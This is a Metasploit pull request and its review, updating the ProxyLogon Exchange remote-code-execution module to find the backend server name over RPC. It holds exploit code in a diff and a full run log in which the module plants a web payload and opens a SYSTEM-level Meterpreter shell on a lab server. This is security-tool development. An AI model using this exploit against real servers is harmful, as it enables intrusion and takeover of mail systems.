### PR TITLE
Proxylogon RCE (Praetorian update)

### PR DESCRIPTION
**Pull request by mekhalleh**
Praetorian has published his PoC of Proxylogon (https://github.com/praetorian-inc/proxylogon-exploit/blob/main/exploit.py).

It is a little different from the one posted this week in msf. I find it interesting, because it uses an RPC call technique to get the backend fqdn. i did a module update for that.

### CODE REVIEW

File: modules/exploits/windows/http/exchange_proxylogon_rce.rb [hunk 1]
```diff
@@ -247,6 +258,36 @@ def request_autodiscover(server_name)
...
+      # Retrieve Domain name subblock info
+      nb_domain = parse_ntlm_info(message, "\x02\x00", 0)
+      # Retrieve Server name subblock info
+      nb_name = parse_ntlm_info(message, "\x01\x00", nb_domain[:new_offset])
+      # Retrieve DNS domain name subblock info
+      dns_domain = parse_ntlm_info(message, "\x04\x00", nb_name[:new_offset])
+      # Retrieve DNS server name subblock info
+      dns_server = parse_ntlm_info(message, "\x03\x00", dns_domain[:new_offset])
+
+      return dns_server[:message].downcase
```
Comment (smcintyre-r7) [inline modules/exploits/windows/http/exchange_proxylogon_rce.rb:285]: By using `Net::NTLM` which we already have as a dependency, we can reduce all of this code and remove the `parse_ntlm_info` function.

```suggestion
      message = Net::NTLM::Message.parse(Rex::Text.decode_base64(hash))
      dns_server = Net::NTLM::TargetInfo.new(message.target_info).av_pairs[Net::NTLM::TargetInfo::MSV_AV_DNS_COMPUTER_NAME]
      return dns_server.force_encoding('UTF-16LE').encode('UTF-8').downcase
```

**Review by smcintyre-r7 — CHANGES_REQUESTED** [review]
I left one comment about code reuse. My other comments which don't really fit into the diff here are that the Praetorian PoC should be added to the references since we are now referring to it to update this technique. The last thing is, can we get a sentence or two added to the module docs for those of us following at home about why this technique is superior to the original? We could be more clear about what the advantage to doing it this way is.

I tested the changes and validated that the module is still working since once these changes are in place, I'll go ahead and land it. Thanks!

**Comment by smcintyre-r7** [comment]
Testing results (with the suggested changes):

```
msf6 exploit(windows/http/exchange_proxylogon_rce) > exploit

[*] Executing automatic check (disable AutoCheck to override)
[*] Using auxiliary/scanner/http/exchange_proxylogon as check
[+] https://192.168.49.58:443 - The target is vulnerable to CVE-2021-26855.
[*] Scanned 1 of 1 hosts (100% complete)
[+] The target is vulnerable.
[*] https://192.168.49.58:443 - Attempt to exploit for CVE-2021-26855
[*] https://192.168.49.58:443 - Retrieving backend FQDN over RPC request
[*] Internal server name (srv02.adlab.local)
[*] https://192.168.49.58:443 - Sending autodiscover request
[*] Server: f652b961-f28e-448f-a8c6-5ff447ff06dd@adlab.local
[*] LegacyDN: /o=ExchangeLab/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=536cfe04ed60470a9a06efe4dfceebf6-Domain admin
[*] https://192.168.49.58:443 - Sending mapi request
[*] SID: S-1-5-21-1051242124-2374699599-3566640746-1113 (TestUserDA@adlab.local)
[*] https://192.168.49.58:443 - Sending ProxyLogon request
[*] Try to get a good msExchCanary (by patching user SID method)
[*] Try to get a good msExchCanary (without correcting the user SID)

[*] ASP.NET_SessionId: 19f972b5-c4da-48db-92f8-268405bcc30a
[*] msExchEcpCanary: q5ca9GvVnk6E6tYk9kd2cHi9rnMh8tgIzfRVymqURrjwuAWx7E2mnQ5rRl0-HjGuLrU1sRCTWD8.
[*] OAB id: 65cbd1dd-2fab-474c-9621-6e1d89f45bbc (OAB (Default Web Site))
[*] https://192.168.49.58:443 - Attempt to exploit for CVE-2021-27065
[*] Prepare the payload on the remote target
[*] Write the payload on the remote target
[!] Wait a lot (0)
[+] Yeeting windows/x64/meterpreter/bind_tcp payload at 192.168.49.58:443
[*] Started bind TCP handler against 192.168.49.58:4444
[*] Sending stage (200262 bytes) to 192.168.49.58
[+] Deleted C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\qjvy.aspx
[*] Meterpreter session 3 opened (0.0.0.0:0 -> 192.168.49.58:4444) at 2021-03-26 15:42:39 -0400

meterpreter > 
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer        : SRV02
OS              : Windows 2016+ (10.0 Build 14393).
Architecture    : x64
System Language : en_US
Domain          : ADLAB
Logged On Users : 7
Meterpreter     : x64/windows
meterpreter > 
```

**Comment by mekhalleh** [comment]
Hello @smcintyre-r7 I corrected based on your suggestions. Thanks for your tips.

I took advantage of this commit to add an advanced option that allows you to manually choose the backend server.

And reintegrated the `X-vDirObjectId` header which is present in the original module (so that there is only the minimum difference with it).

**Comment by smcintyre-r7** [comment]
I pushed up some tweaks to the verbiage in commit 11f4946 that adjusted things for clarity. I also removed the references from the documentation since when it's rendered with `info -d` it's redundant with the contents of the "Overview" section meaning that now we don't have to keep them synced.

Once the unit tests pass, I'll have this merged in. Thanks @mekhalleh !

**Review by smcintyre-r7 — APPROVED** [review]

**Comment by smcintyre-r7** [comment]
# Release Notes
This updates the ProxyLogon RCE module to use an RPC request to identify the backend server's FQDN.

**Pull request merged**